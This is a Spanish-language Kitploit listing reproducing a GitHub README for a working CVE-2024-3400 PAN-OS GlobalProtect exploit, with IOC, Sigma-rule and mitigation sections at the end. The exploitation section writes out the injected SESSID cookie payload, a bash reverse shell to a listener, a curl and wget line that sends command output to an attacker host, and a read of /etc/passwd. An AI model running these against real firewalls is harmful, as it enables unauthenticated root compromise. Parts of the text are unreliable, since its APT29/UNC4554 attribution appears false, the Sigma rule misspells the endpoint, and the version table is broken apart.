Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2024-3400-panos_rce_reproduction — Reproducción de cve-2024-3400-panos_rce_reproduction | Kitploit
Herramientas/GitHubGitHub/razureink/cve-2024-3400-panos_rce_reproduction
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlAprendizaje y EducaciónRed TeamingLabs y Práctica

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
razureink/cve-2024-3400-panos_rce_reproduction

cve-2024-3400-panos_rce_reproduction

Reproducción de cve-2024-3400-panos_rce_reproduction

Ver Repositorio
hace 27 díasAún no revisado

CVE-2024-3400: Inyección de Comandos RCE en GlobalProtect de Palo Alto PAN-OS

CVSS 10.0 CRÍTICO | CWE-78: Inyección de Comandos del SO | Explotado Masivamente en la Naturaleza


Información General

CVE-2024-3400 es una vulnerabilidad de inyección de comandos sin autenticación previa en las interfaces del portal y la pasarela (gateway) GlobalProtect de Palo Alto Networks PAN-OS. La vulnerabilidad permite a un atacante no autenticado ejecutar comandos arbitrarios con privilegios de root en el firewall afectado.

  • Descubierta por: Volexity (abril de 2024)
  • Actor de amenazas atribuido: UNC4554 / Midnight Blizzard (patrocinado por el estado ruso)
  • ID de CVE: CVE-2024-3400
  • Puntuación CVSS: 10.0 (Crítico)
  • CWE: CWE-78 (Neutralización incorrecta de elementos especiales utilizados en un comando del SO)
  • Impacto: Compromiso total de los firewalls PAN-OS, movimiento lateral, despliegue de ransomware
  • Estado: Explotado activamente como 0-day antes de la divulgación pública

Detalles Técnicos

Causa Raíz

La vulnerabilidad reside en el manejo de cookies de sesión del componente del portal y la pasarela GlobalProtect. La función responsable de procesar la cookie SESSID no sanea adecuadamente la entrada proporcionada por el usuario antes de pasarla a un comando de shell.

Específicamente, una solicitud HTTP no autenticada al endpoint del portal GlobalProtect (/global-protect/login.esp) con una cookie SESSID manipulada que contiene metacaracteres de shell incrustados (backticks y expansión de variables) resulta en inyección de comandos.

Mecanismo de Inyección

La ruta de código vulnerable funciona de la siguiente manera:

  1. El portal GlobalProtect recibe una solicitud a /global-protect/login.esp
  2. El valor de la cookie SESSID se extrae sin saneamiento
  3. Este valor se interpola en una cadena de comando de shell
  4. El comando se ejecuta mediante system() o una función similar de ejecución de comandos del sistema operativo
  5. Debido a que la aplicación se ejecuta como root, el comando inyectado se ejecuta con privilegios completos del sistema

Construcción del Payload

El payload de inyección utiliza comandos delimitados por backticks dentro de la cookie SESSID:

root@kitploit:~
SESSID=/../../../opt/panlogs/tmp/device_telemetry/`COMMAND`.py

El path traversal (/../../../) permite salir del directorio previsto, y la porción COMMAND entre backticks hace que el shell ejecute la entrada del atacante. Se pueden utilizar mecanismos de redirección de salida o reverse shell para exfiltrar los resultados de los comandos.


Versiones Afectadas

Versión PAN-OSAfectadasCorregida en
10.2.x< 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h110.2.4-h16 / 10.2.5-h6 / 10.2.6-h3 / 10.2.7-h8 / 10.2.8-h3 / 10.2.9-h1
11.0.x

Nota: PAN-OS 9.x y versiones anteriores no están afectadas. Cloud NGFW y Prisma Access no están afectados.


Explotación

Vector de Ataque

  • Red: Remoto
  • Autenticación: No requerida
  • Privilegio requerido: Ninguno
  • Interacción del usuario: Ninguna
  • Impacto: Compromiso total de la confidencialidad, integridad y disponibilidad

Actividad Observada del Actor de Amenazas

Se observó a UNC4554 / Midnight Blizzard (APT29) explotando CVE-2024-3400 como 0-day a partir de marzo de 2024. Volexity publicó su análisis el 12 de abril de 2024. Los patrones de ataque incluyeron:

  1. Acceso inicial: Escaneo masivo en busca de portales GlobalProtect expuestos
  2. Ejecución de comandos: Implementación de backdoors personalizados en Python mediante el vector de inyección por cookie
  3. Persistencia: Instalación del backdoor UPSTYLE, robo de credenciales, extracción de configuración
  4. Movimiento lateral: Uso de firewalls comprometidos como punto de apoyo hacia redes internas
  5. Exfiltración de datos: Robo de archivos de configuración, credenciales VPN y tokens de sesión
  6. Ransomware: Múltiples incidentes de despliegue de ransomware tras el compromiso inicial

Disponibilidad de Prueba de Concepto

Se han publicado múltiples PoCs públicas. Este repositorio proporciona un exploit funcional para pruebas autorizadas.


Pasos de Reproducción

Requisitos

  • Python 3.8+
  • Librería requests
  • Objetivo: Palo Alto PAN-OS con un portal GlobalProtect vulnerable expuesto
  • Solo acceso autorizado

Configuración

root@kitploit:~
pip install requests

Exploit Básico

root@kitploit:~
python exploit.py --target https://vulnerable-firewall.example.com --command "id"

Ejemplo de Reverse Shell

root@kitploit:~
# Iniciar listener en la máquina del atacante
nc -lvnp 4444

# Ejecutar reverse shell
python exploit.py --target https://vuln-panos.example.com \
  --command "bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1'"

Lectura Arbitraria de Archivos

root@kitploit:~
python exploit.py --target https://vuln-panos.example.com --command "cat /etc/passwd"

Prueba de Concepto (curl)

root@kitploit:~
# Prueba básica de ejecución de comandos
curl -k --cookie "SESSID=/../../../opt/panlogs/tmp/device_telemetry/\`id\`.py" \
  'https://target/global-protect/login.esp'

# Captura de la salida del comando mediante exfiltración por DNS
curl -k --cookie "SESSID=/../../../opt/panlogs/tmp/device_telemetry/\`wget -O- http://attacker/$(id|base64)\`.py" \
  'https://target/global-protect/login.esp'

Script PoC

Consulte exploit.py en este repositorio para obtener un exploit Python completo que permite:

  • Ejecución arbitraria de comandos
  • Soporte opcional de proxy (Burp Suite / mitmproxy)
  • Control de verificación SSL
  • Manejo de tiempos de espera y reintentos
  • Análisis de respuestas

Detección

IOCs

  • Solicitudes a /global-protect/login.esp con cookies SESSID anormalmente largas o sospechosas
  • Cookies que contienen secuencias de path traversal (/../../) combinadas con caracteres backtick
  • Procesos inesperados generados por el componente GlobalProtect
  • Conexiones salientes desde el firewall hacia direcciones IP desconocidas en puertos inusuales
  • Archivos escritos en /opt/panlogs/tmp/device_telemetry/ con extensiones .py

Regla Sigma (Simplificada)

root@kitploit:~
title: CVE-2024-3400 PAN-OS GlobalProtect Command Injection
status: stable
logsource:
  category: webserver
detection:
  selection:
    cs-uri-query: "/global-protocol/login.esp"
    cs-cookie|contains:
      - "../"
      - "`"
  condition: selection

Mitigación

Acciones Inmediatas

  1. Actualice PAN-OS a las versiones corregidas listadas anteriormente
  2. Si no es posible aplicar el parche de inmediato, aplique una de las siguientes mitigaciones:
    • Deshabilitar Device Telemetry: set deviceconfig system telemetry disable yes (bloquea la ruta de código vulnerable sin requerir un reinicio)
    • Control de Acceso al Portal/Pasarela GlobalProtect: Restrinja el acceso a direcciones IP de origen confiables
  3. Busque señales de compromiso: Verifique si hay archivos no autorizados en /opt/panlogs/tmp/device_telemetry/
  4. Revise los registros: Audite los registros de inicio de sesión de GlobalProtect en busca de valores anómalos de cookies SESSID

Corrección Permanente

Aplique el hotfix proporcionado por Palo Alto Networks. La corrección sanea adecuadamente la entrada de la cookie antes de la construcción del comando de shell.

Evaluación de Compromiso

Si sospecha que ha habido explotación:

  1. Recopile imágenes forenses de los firewalls afectados
  2. Audite todos los cambios de configuración (marcas de tiempo de última modificación)
  3. Revise los procesos en ejecución y los trabajos cron
  4. Verifique si hay claves SSH y cuentas de usuario no autorizadas
  5. Rote todas las credenciales VPN y secretos compartidos
  6. Inspeccione el tráfico de red en busca de patrones de comunicación C2

Referencias


Descargo de Responsabilidad

Este repositorio se proporciona solo para pruebas de seguridad autorizadas y fines educativos. La explotación no autorizada de esta vulnerabilidad es ilegal. Los autores no son responsables del mal uso de esta información. Asegúrese siempre de tener permiso explícito por escrito antes de probar cualquier sistema.


Licencia

Licencia MIT: este contenido se proporciona para investigación de seguridad defensiva y pruebas autorizadas.

Descargar herramienta
< 11.0.1-h10, < 11.0.2-h4, < 11.0.3-h10
11.0.1-h10 / 11.0.2-h4 / 11.0.3-h10
11.1.x< 11.1.1-h311.1.1-h3
FuenteEnlace
Aviso de seguridad de Palo Altohttps://security.paloaltonetworks.com/CVE-2024-3400
Análisis de Volexityhttps://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-command-injection-vulnerability-in-palo-alto-networks-pan-os/
Entrada de NVDhttps://nvd.nist.gov/vuln/detail/CVE-2024-3400
Detalle de CWE-78https://cwe.mitre.org/data/definitions/78.html
CISA KEVhttps://www.cisa.gov/known-exploited-vulnerabilities-catalog
Técnica ATT&CKhttps://attack.mitre.org/techniques/T1190/